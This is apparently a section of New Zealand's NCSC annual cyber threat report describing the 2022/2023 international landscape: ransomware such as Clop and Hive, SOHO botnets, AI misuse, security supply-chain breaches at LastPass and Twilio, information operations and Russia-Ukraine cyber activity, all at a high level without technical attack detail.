Te āhuatanga i te ao International landscape

Cyber crime and disruption

The numerous disruptive financially motivated cyber incidents the NCSC recorded this year reflects the international landscape. Significant suppliers were compromised and held to ransom, with the manufacturing and healthcare sectors among the most impacted globally this year. Cyber criminals target these sectors owing to their sensitivity to downtime and disruption, and reliance on older technology.

In past years, the NCSC observed extensive targeting of software vulnerabilities, predominantly from sophisticated cyber actors. Cyber criminals are now capable of this speed and scale of exploitation, previously the purview of likely state-backed actors. This was evident in June 2023 with the re-emergence of ‘Clop’ ransomware targeting users of Progress Software’s MOVEit Transfer, a web based file-transfer application. Clop accessed over 100 instances of MOVEit using a zero-day vulnerability in the software, targeting organisations in the government, manufacturing, media, transport, retail, and professional services sectors. Clop, first observed in 2019, was among the pioneers of the ‘double extortion’ tactic – exfiltrating sensitive data before encrypting the victim’s copy of the files. Increasingly cyber criminals forego the encryption step, preferring to rely on data exfiltration to use as leverage over victims.

While power and popularity has coalesced in the hands of a few dominant ransomware-as-a-service providers over the 2022/2023 year, it has not entirely expunged opportunity for novel variants and new players. Just as we have observed enhanced speed and innovation in the ‘initial access’ phase, encryption has evolved and become increasingly automated. Cyber criminals have also optimised for the ransom of suppliers. For instance, developing malware to achieve high-impact compromises of hypervisors – an enabling software commonly used by infrastructure-as-a-service providers. Disabling of a hypervisor could have far-reaching impacts for multiple organisations that have a presence on the same physical hardware.

Cyber criminals will continue to innovate, whether it is in the area of encryption, deployment, defence evasion, or extortion tactics. In some instances, the perception of encryption is enough to deceive unwitting individuals and organisations, and in others, partial encryption of just a portion of a file has been an effective way to disrupt business processes at pace.

In our region, the NCSC observed significant disruptive malicious cyber activity affecting our Southwest Pacific neighbours. Vanuatu and Tonga had their resilience tested by significant cyber incidents against government and telecommunications systems this year. To aid their recovery, CERT NZ provided advice and support to Pacific victims of profit-motivated disruption.

Investing in and reinforcing resilient practices, along with detecting and responding to incidents in a timely way, are core to deterring cyber criminal activity. However, disruptions to criminal infrastructure and operations is an increasingly common form of deterrence. Collaboration between law enforcement organisations led to seizures of criminal infrastructure in the fiscal year. For instance, the US Federal Bureau of Investigation (FBI) seized infrastructure belonging to Hive ransomware operators in January 2023, announcing it had infiltrated Hive’s network since July 2022. In doing so, the FBI was able to provide over 300 decryption keys, negating US$130 million of ransom demands. In an effort to discourage payments to organised criminals that perpetuate the cyber criminal ecosystem, many likeminded countries are putting in place clear disincentives for paying ransoms, and insurers are increasingly excluding cyber ransom payments from their policies. Also in the 2022/2023 year, Microsoft and Forta (makers of Cobalt Strike, a popular penetration-testing suite) took legal action to identify and disable pirated and legacy instances of Cobalt Strike. Malicious cyber actors commonly abuse Cobalt Strike’s capabilities to enable their malicious computer network operations. These kinds of actions have likely set precedent as a novel way to deter cyber criminal activity.

Obfuscation complicating detection

In 2022/2023, cyber security industry reporting identified a number of sophisticated botnets with the primary purpose of obfuscating the true origins of malicious cyber activity. During investigations into PRC malicious cyber activity, partners identified the use of compromised small office/home office (SOHO) devices in the geographic area of the victim.

Over the 2022/2023 year, malicious cyber actors have exploited weaknesses in a number of aging or end-of-life SOHO devices, notably routers and internet modems. SOHO devices are likely preferred for these more sophisticated botnets, owing to their capacity to handle high volumes of network traffic without causing service degradation, thereby avoiding alerting their legitimate users to the compromise.

Botnets almost certainly provide malicious cyber actors with cost-savings. For many sophisticated cyber actors, the exploitation of even thousands of vulnerable devices almost certainly falls short of the cost associated with maintaining operational infrastructure via legitimate providers. Additionally, legitimate providers are more likely to have monitoring and complaints processes that could disrupt malicious cyber activity on their platforms.

Industry analysis suggests compromise of internet-connected devices, such as routers or internet-of-things (IoT) devices, could also enable further compromises of inner network devices – previously assumed to be secured behind a gateway. These internationally identified trends in tactics and techniques for infrastructure procurement correlates with the NCSC’s own observations about the compromise of devices for use in botnets over at least the last two fiscal years.

Artificial intelligence has also begun to uplift malicious cyber actors’ defence evasion. Large language models and generative AI may be misused to add an air of legitimacy to a phishing campaign – thwarting human defences. Meanwhile, AI can quickly synthesise derivative malware that could evade technical detection capabilities. In 2022/2023, the NCSC observed rapid advances in AI and early signs of it being used in malicious cyber activity overseas. Big data could also enable the reconnaissance function of a malicious cyber campaign, including surmising connections between disparate pieces of personal or network information, or painting a picture of a victim’s preferences, to inform the malicious cyber actor’s approach.

It is also likely that AI enables greater cyber defences. AI-derived heuristics may be better than humans at identifying ‘living off the land’ and other hard to track techniques where a number of innocuous actions need to be assessed together in context to identify activity that is malicious.

Targeting the security supply chain

A feature of the international landscape in 2022/2023 was incidents affecting the security supply chain – software or services relied on to enable information security.

In August 2022, the popular password manager LastPass announced that its proprietary technical information and source code had been breached as part of a cyber incident. Security services represent a valuable target for both espionage and financially motivated actors. It is possible the malicious cyber actors sought an understanding of LastPass’ systems and controls in order to stage a more audacious compromise of users’ password vaults. These passwords may enable downstream access into networks of high intelligence or extortion value.

In the same month Twilio – a short message service (SMS) provider – reported a compromise during which a small but significant subset of customers was targeted. Accounts targeted belonged to the makers of the secure messaging application Signal, and the two-factor authentication application Authy. This deliberate targeting of specific Twilio customers suggested intent by malicious cyber actors to insert themselves into significant organisations’ security supply chains.

A coalescence of security services into the hands of a few cloud-based suppliers has provided security gains and, equally, incentive and opportunities for cyber threat actors. It is likely these high-profile examples have both resulted in a security culture change and uplift at similar organisations, while providing examples and proofs-of-concept to other capable malicious cyber actors.

Information operations

Information operations rely on technology and techniques similar to those used by malicious cyber actors conducting computer network exploitation. While the NCSC does not focus on tracking and responding to information operations, this overlap can make assessing the cyber threat environment more fraught.

Increasingly, technology enables a wider array of information operations. Just as commercial spyware has enabled more states – and even private organisations – to conduct commercial or political espionage, so too have private contractors systematised the spread of information to achieve strategic objectives. In some cases, information operations may be combined with computer network exploitation to meet requirements. For instance, contractors working for political candidates or incumbents to destabilise their opposition may compromise the email or social media accounts of their opponents, as well as manipulating discourse through inauthentic behaviour on public social media platforms. Information collected as part of a malicious cyber campaign might also shape the information environment. Hack-and-leak activity targeting prominent individuals or groups would be a form of malinformation – a truth used to inflict harm on a person, organisation, or state. The NCSC has a mandate to disrupt and support the victims of malicious cyber activity affecting the confidentiality, integrity or availability of Aotearoa New Zealand nationally significant computer networks. As such, the NCSC has a limited role when it comes to information operations, but we are responsive to reporting from our security partners and the public regarding possible information operations.

Russia-Ukraine

Shifts in the cyber threat landscape following Russia’s invasion of Ukraine in February 2022 continue to be felt internationally. Russia-aligned cyber actors are likely emboldened by the invasion, and we continue to see concerning activity affecting Russia’s neighbours and our like-minded partners. As the invasion persisted into 2023, malicious cyber activity continued to be observed in support of Russia and Ukraine, albeit not to the extent many suspected. The support Ukraine received to improve their cyber defences may have hampered the effectiveness of Russia’s actions in cyberspace.

Whatever the case, Russian malicious cyber activity has likely continued its pre-invasion trajectory, including targeting individuals of high espionage value with sophisticated social engineering and malware. This traditional cyber espionage has been punctuated by disruptive cyber campaigns directed at Ukraine and Russia’s other neighbours.

A theme of the year’s cyber landscape has been the rise of issue-motivated malicious cyber actors on both sides of the conflict. On the Russian side, these actors are likely emboldened by permissive attitudes to cyber-enabled crime within Russian borders. Issue-motivated cyber activity has usually followed the public commitment of support to Ukraine from Western democracies. Issue-motivated malicious cyber actors have widely targeted Western organisations with denial-of-service campaigns, including in the healthcare sector, with mixed success. The NCSC remains concerned about accidental escalation as a result of disruptive malicious cyber activity stemming from the Russia-Ukraine conflict.

The main cyber threat to Aotearoa New Zealand due to Russia’s invasion of Ukraine is indirect cyber targeting, affecting our critical supply chains. State-sponsored and non-state cyber actors alike could disrupt key suppliers on which Aotearoa New Zealand organisations depend.